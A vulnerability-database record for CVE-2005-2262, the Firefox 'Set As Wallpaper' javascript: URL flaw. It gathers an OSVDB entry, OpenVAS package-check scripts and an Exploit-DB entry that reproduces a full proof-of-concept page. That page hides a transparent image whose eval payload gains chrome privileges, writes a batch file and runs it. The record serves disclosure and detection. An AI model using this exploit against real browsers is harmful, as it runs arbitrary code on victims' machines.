ID CVE-2005-2262 Type cve Reporter cve@mitre.org Modified 2017-10-11T01:30:00
Description
Firefox 1.0.3 and 1.0.4, and Netscape 8.0.2, allows remote attackers to execute arbitrary code by tricking the user into using the "Set As Wallpaper" (in Firefox) or "Set as Background" (in Netscape) context menu on an image URL that is really a javascript: URL with an eval statement, aka "Firewalling."
{"osvdb": [{"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2262"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: https://bugzilla.mozilla.org/show_bug.cgi?id=292737\n[Vendor Specific Advisory URL](http://www.mozilla.org/security/announce/mfsa2005-47.html)\n[Secunia Advisory ID:16095](https://secuniaresearch.flexerasoftware.com/advisories/16095/)\n[Secunia Advisory ID:16418](https://secuniaresearch.flexerasoftware.com/advisories/16418/)\n[Secunia Advisory ID:16043](https://secuniaresearch.flexerasoftware.com/advisories/16043/)\n[Secunia Advisory ID:16507](https://secuniaresearch.flexerasoftware.com/advisories/16507/)\n[Secunia Advisory ID:16044](https://secuniaresearch.flexerasoftware.com/advisories/16044/)\nOther Advisory URL: http://www.mikx.de/firewalling/\nOther Advisory URL: http://www.debian.org/security/2005/dsa-779\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200507-14.xml\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2005_45_mozilla.html\nOther Advisory URL: http://www.networksecurity.fi/advisories/netscape-multiple-issues.html\n[CVE-2005-2262](https://vulners.com/cve/CVE-2005-2262)\nCIAC Advisory: p-252\nBugtraq ID: 14242\n", "modified": "2005-05-03T07:02:23", "published": "2005-05-03T07:02:23", "href": "https://vulners.com/osvdb/OSVDB:17965", "id": "OSVDB:17965", "type": "osvdb", "title": "Multiple Browser \"Set As Wallpaper\" Dialog Arbitrary Script Execution", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:33:13", "description": "Mozilla Firefox <= 1.0.4 \"Set As Wallpaper\" Code Execution Exploit. CVE-2005-2262. Remote exploit for windows platform", "published": "2005-07-13T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox <= 1.0.4 - \"Set As Wallpaper\" Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2262"], "modified": "2005-07-13T00:00:00", "id": "EDB-ID:1102", "href": "https://www.exploit-db.com/exploits/1102/", "sourceData": "// Exploit by Michael Krax\r\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\r\n<html>\r\n<head>\r\n<title>Firewalling - Proof-of-Concept</title>\r\n<script>\r\nfunction stopload() {\r\n// in some cases the javascript url never stops to load\r\n// therefore we force a stop after the real image got loaded\r\nwindow.setTimeout(\"window.stop()\",1000);\r\n}\r\n</script>\r\n</head>\r\n<body>\r\n<div style=\"font-family:Verdana;font-size:11px;\">\r\n\r\n<div style=\"font-family:Verdana;font-size:15px;font-weight:bold;\">\r\nFirewalling - Proof-of-Concept</div>\r\n<div style=\"width:600px\">\r\nThe \"Set As Wallpaper\" dialog takes the image url as a parameter without validating it.\r\nThis allows to execute javascript in chrome and to run arbitrary code.\r\n<br><br>\r\nBy using absolute positioning and the moz-opacity filter an attacker can easily fool the\r\nuser to think he is setting a valid image as wallpaper.\r\n<br><br>\r\nRight click on the image and choose \"Set As Wallpaper\". The demo requests\r\nUniversalXPConnect rights, creates c:\\booom.bat and launches the batch file\r\nthat shows a directoy listing in a dos box (Windows only).\r\n<br><br>\r\n\r\n<div style=\"position:relative; width:300px; height:250px;\">\r\n<img src=\"javascript:/*-----------------------------*/eval('if(document.location.href.\r\nsubstr(0,6)==\\'chrome\\'){netscape.security.PrivilegeManager.enablePrivilege(\\'\r\nUniversalXPConnect\\');file=Components.classes[\\'@mozilla.org/file/local;1\\'].\r\ncreateInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\'c:\\\\\\\\\r\nbooom.bat\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,\r\n420);outputStream=Components.classes[\\'@mozilla.org/network/file-output-stream;\r\n1\\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init\r\n(file,0x04|0x08|0x20,420,0);output=\\'@ECHO OFF\\\\n:BEGIN\\\\nCLS\\\\nDIR\\\\nPAUSE\r\n\\\\n:END\\';outputStream.write(output,output.length);outputStream.close();file.launch\r\n();}else{void(0)}')\" width=\"300\" height=\"250\" alt=\"\" border=\"0\" style=\"position:\r\nabsolute; left:0px; top:0px; z-index:2; -moz-opacity:0;\">\r\n<img src=\"http://www.milw0rm.com/images/logo.png\" width=\"300\" height=\"250\" alt=\"\" border=\"0\" style=\"position:\r\nabsolute; left:0px; top:0px; z-index:1;\" onload=\"stopload()\">\r\n</div>\r\n</div>\r\n</body>\r\n\r\n</html>\r\n\r\n# milw0rm.com [2005-07-13]\r\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1102/"}], "openvas": [{"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2005-2261", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "description": "The remote host is missing an update to mozilla-firefox\nannounced via advisory DSA 779-2.\n\nWe experienced that the update for Mozilla Firefox from DSA 779-1\nunfortunately was a regression in several cases. Since the usual\npraxis of backporting apparently does not work, this update is\nbasically version 1.0.6 with the version number rolled back, and hence\nstill named 1.0.4-*. For completeness below is the original advisory\ntext:\n\nSeveral problems have been discovered in Mozilla Firefox, a\nlightweight web browser based on Mozilla. The Common Vulnerabilities\nand Exposures project identifies the following problems:\n\nCVE-2005-2260\n\nThe browser user interface does not properly distinguish between\nuser-generated events and untrusted synthetic events, which makes\nit easier for remote attackers to perform dangerous actions that\nnormally could only be performed manually by the user.\n\nCVE-2005-2261\n\nXML scripts ran even when Javascript disabled.\n\nCVE-2005-2262\n\nThe user can be tricked to executing arbitrary JavaScript code by\nusing a JavaScript URL as wallpaper.\n\nCVE-2005-2263\n\nIt is possible for a remote attacker to execute a callback\nfunction in the context of another domain (i.e. frame).\n\nCVE-2005-2264\n\nBy opening a malicious link in the sidebar it is possible for\nremote attackers to steal sensitive information.\n\nCVE-2005-2265\n\nMissing input sanitising of InstallVersion.compareTo() can cause\nthe application to crash.\n\nCVE-2005-2266\n\nRemote attackers could steal sensitive information such as cookies\nand passwords from web sites by accessing data in alien frames.\n\nCVE-2005-2267\n\nBy using standalone applications such as Flash and QuickTime to\nopen a javascript: URL, it is possible for a remote attacker to\nsteal sensitive information and possibly execute arbitrary code.\n\nCVE-2005-2268\n\nIt is possible for a Javascript dialog box to spoof a dialog box\nfrom a trusted site and facilitates phishing attacks.\n\nCVE-2005-2269\n\nRemote attackers could modify certain tag properties of DOM nodes\nthat could lead to the execution of arbitrary script or code.\n\nCVE-2005-2270\n\nThe Mozilla browser familie does not properly clone base objects,\nwhich allows remote attackers to execute arbitrary code.\n\nThe old stable distribution (woody) is not affected by these problems.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:55205", "href": "http://plugins.openvas.org/nasl.php?oid=55205", "type": "openvas", "title": "Debian Security Advisory DSA 779-2 (mozilla-firefox)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_779_2.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 779-2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 1.0.4-2sarge3.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.0.6-1.\n\nWe recommend that you upgrade your Mozilla Firefox packages.\n\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20779-2\";\ntag_summary = \"The remote host is missing an update to mozilla-firefox\nannounced via advisory DSA 779-2.\n\nWe experienced that the update for Mozilla Firefox from DSA 779-1\nunfortunately was a regression in several cases. Since the usual\npraxis of backporting apparently does not work, this update is\nbasically version 1.0.6 with the version number rolled back, and hence\nstill named 1.0.4-*. For completeness below is the original advisory\ntext:\n\nSeveral problems have been discovered in Mozilla Firefox, a\nlightweight web browser based on Mozilla. The Common Vulnerabilities\nand Exposures project identifies the following problems:\n\nCVE-2005-2260\n\nThe browser user interface does not properly distinguish between\nuser-generated events and untrusted synthetic events, which makes\nit easier for remote attackers to perform dangerous actions that\nnormally could only be performed manually by the user.\n\nCVE-2005-2261\n\nXML scripts ran even when Javascript disabled.\n\nCVE-2005-2262\n\nThe user can be tricked to executing arbitrary JavaScript code by\nusing a JavaScript URL as wallpaper.\n\nCVE-2005-2263\n\nIt is possible for a remote attacker to execute a callback\nfunction in the context of another domain (i.e. frame).\n\nCVE-2005-2264\n\nBy opening a malicious link in the sidebar it is possible for\nremote attackers to steal sensitive information.\n\nCVE-2005-2265\n\nMissing input sanitising of InstallVersion.compareTo() can cause\nthe application to crash.\n\nCVE-2005-2266\n\nRemote attackers could steal sensitive information such as cookies\nand passwords from web sites by accessing data in alien frames.\n\nCVE-2005-2267\n\nBy using standalone applications such as Flash and QuickTime to\nopen a javascript: URL, it is possible for a remote attacker to\nsteal sensitive information and possibly execute arbitrary code.\n\nCVE-2005-2268\n\nIt is possible for a Javascript dialog box to spoof a dialog box\nfrom a trusted site and facilitates phishing attacks.\n\nCVE-2005-2269\n\nRemote attackers could modify certain tag properties of DOM nodes\nthat could lead to the execution of arbitrary script or code.\n\nCVE-2005-2270\n\nThe Mozilla browser familie does not properly clone base objects,\nwhich allows remote attackers to execute arbitrary code.\n\nThe old stable distribution (woody) is not affected by these problems.\";\n\n\nif(description)\n{\n script_id(55205);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:00:53 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-2260\", \"CVE-2005-2261\", \"CVE-2005-2262\", \"CVE-2005-2263\", \"CVE-2005-2264\", \"CVE-2005-2265\", \"CVE-2005-2266\", \"CVE-2005-2267\", \"CVE-2005-2268\", \"CVE-2005-2269\", \"CVE-2005-2270\");\n script_bugtraq_id(14242);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 779-2 (mozilla-firefox)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mozilla-firefox\", ver:\"1.0.4-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-firefox-dom-inspector\", ver:\"1.0.4-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-firefox-gnome-support\", ver:\"1.0.4-2sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2005-2261", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "description": "The remote host is missing an update to mozilla-firefox\nannounced via advisory DSA 779-1.\n\nSeveral problems have been discovered in Mozilla Firefox, a\nlightweight web browser based on Mozilla. For more details,\nplease visit the referenced security advisory.\n\nThe old stable distribution (woody) is not affected by these problems.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:55121", "href": "http://plugins.openvas.org/nasl.php?oid=55121", "type": "openvas", "title": "Debian Security Advisory DSA 779-1 (mozilla-firefox)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_779_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 779-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 1.0.4-2sarge2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.0.6-1.\n\nWe recommend that you upgrade your Mozilla Firefox packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20779-1\";\ntag_summary = \"The remote host is missing an update to mozilla-firefox\nannounced via advisory DSA 779-1.\n\nSeveral problems have been discovered in Mozilla Firefox, a\nlightweight web browser based on Mozilla. For more details,\nplease visit the referenced security advisory.\n\nThe old stable distribution (woody) is not affected by these problems.\";\n\n\nif(description)\n{\n script_id(55121);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:00:53 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-2260\", \"CVE-2005-2261\", \"CVE-2005-2262\", \"CVE-2005-2263\", \"CVE-2005-2264\", \"CVE-2005-2265\", \"CVE-2005-2266\", \"CVE-2005-2267\", \"CVE-2005-2268\", \"CVE-2005-2269\", \"CVE-2005-2270\");\n script_bugtraq_id(14242);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 779-1 (mozilla-firefox)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mozilla-firefox\", ver:\"1.0.4-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-firefox-dom-inspector\", ver:\"1.0.4-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-firefox-gnome-support\", ver:\"1.0.4-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200507-24.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:55000", "href": "http://plugins.openvas.org/nasl.php?oid=55000", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200507-24 (mozilla)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities in the Mozilla Suite allow attacks ranging from the\nexecution of javascript code with elevated privileges to information\nleakage.\";\ntag_solution = \"All Mozilla Suite users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/mozilla-1.7.10'\n\nAll Mozilla Suite binary users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/mozilla-bin-1.7.10'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200507-24\nhttp://bugs.gentoo.org/show_bug.cgi?id=98846\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html#Mozilla\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200507-24.\";\n\n \n\nif(description)\n{\n script_id(55000);\n script_version(\"$Revision: 6596 $\");\n script_cve_id(\"CVE-2005-1937\", \"CVE-2005-2260\", \"CVE-2005-2261\", \"CVE-2005-2262\",\n \"CVE-2005-2263\", \"CVE-2005-2264\", \"CVE-2005-2265\", \"CVE-2005-2266\",\n \"CVE-2005-2267\", \"CVE-2005-2268\", \"CVE-2005-2269\", \"CVE-2005-2270\");\n script_bugtraq_id(14242);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200507-24 (mozilla)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-client/mozilla\", unaffected: make_list(\"ge 1.7.10\"), vulnerable: make_list(\"lt 1.7.10\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"www-client/mozilla-bin\", unaffected: make_list(\"ge 1.7.10\"), vulnerable: make_list(\"lt 1.7.10\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2004-0718", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-19T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:54365", "href": "http://plugins.openvas.org/nasl.php?oid=54365", "type": "openvas", "title": "FreeBSD Ports: firefox", "sourceData": "#\n#VID 5d72701a-f601-11d9-bcd1-02061b08fc24\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n firefox\n linux-firefox\n mozilla\n linux-mozilla\n linux-mozilla-devel\n netscape7\n de-linux-mozillafirebird\n el-linux-mozillafirebird\n ja-linux-mozillafirebird-gtk1\n ja-mozillafirebird-gtk2\n linux-mozillafirebird\n ru-linux-mozillafirebird\n zhCN-linux-mozillafirebird\n zhTW-linux-mozillafirebird\n de-linux-netscape\n de-netscape7\n fr-linux-netscape\n fr-netscape7\n ja-linux-netscape\n ja-netscape7\n linux-netscape\n linux-phoenix\n mozilla+ipv6\n mozilla-embedded\n mozilla-firebird\n mozilla-gtk1\n mozilla-gtk2\n mozilla-gtk\n mozilla-thunderbird\n phoenix\n pt_BR-netscape7\n\nCVE-2005-1937\nA regression error in Firefox 1.0.3 and Mozilla 1.7.7 allows remote\nattackers to inject arbitrary Javascript from one page into the\nframeset of another site, aka the frame injection spoofing\nvulnerability, a re-introduction of a vulnerability that was\noriginally identified and addressed by CVE-2004-0718.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html\nhttp://www.mozilla.org/security/announce/mfsa2005-45.html\nhttp://www.mozilla.org/security/announce/mfsa2005-46.html\nhttp://www.mozilla.org/security/announce/mfsa2005-47.html\nhttp://www.mozilla.org/security/announce/mfsa2005-48.html\nhttp://www.mozilla.org/security/announce/mfsa2005-49.html\nhttp://www.mozilla.org/security/announce/mfsa2005-50.html\nhttp://www.mozilla.org/security/announce/mfsa2005-51.html\nhttp://www.mozilla.org/security/announce/mfsa2005-52.html\nhttp://www.mozilla.org/security/announce/mfsa2005-53.html\nhttp://www.mozilla.org/security/announce/mfsa2005-54.html\nhttp://www.mozilla.org/security/announce/mfsa2005-55.html\nhttp://www.mozilla.org/security/announce/mfsa2005-56.html\nhttp://www.vuxml.org/freebsd/5d72701a-f601-11d9-bcd1-02061b08fc24.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(54365);\n script_version(\"$Revision: 4112 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-19 15:17:59 +0200 (Mon, 19 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2005-1937\", \"CVE-2005-2260\", \"CVE-2005-2261\", \"CVE-2005-2262\", \"CVE-2005-2263\", \"CVE-2005-2264\", \"CVE-2005-2265\", \"CVE-2005-2266\", \"CVE-2005-2267\", \"CVE-2005-2268\", \"CVE-2005-2269\", \"CVE-2005-2270\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: firefox\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.5,1\")<0) {\n txt += 'Package firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.5\")<0) {\n txt += 'Package linux-firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.9,2\")<0) {\n txt += 'Package mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.*,2\")>=0) {\n txt += 'Package mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-mozilla\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.9\")<0) {\n txt += 'Package linux-mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8\")>=0) {\n txt += 'Package linux-mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-mozilla-devel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.9\")<0) {\n txt += 'Package linux-mozilla-devel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8\")>=0) {\n txt += 'Package linux-mozilla-devel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"de-linux-mozillafirebird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package de-linux-mozillafirebird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"el-linux-mozillafirebird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package el-linux-mozillafirebird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-linux-mozillafirebird-gtk1\");\nif(!isnull(bver) && revcomp(a:bver, 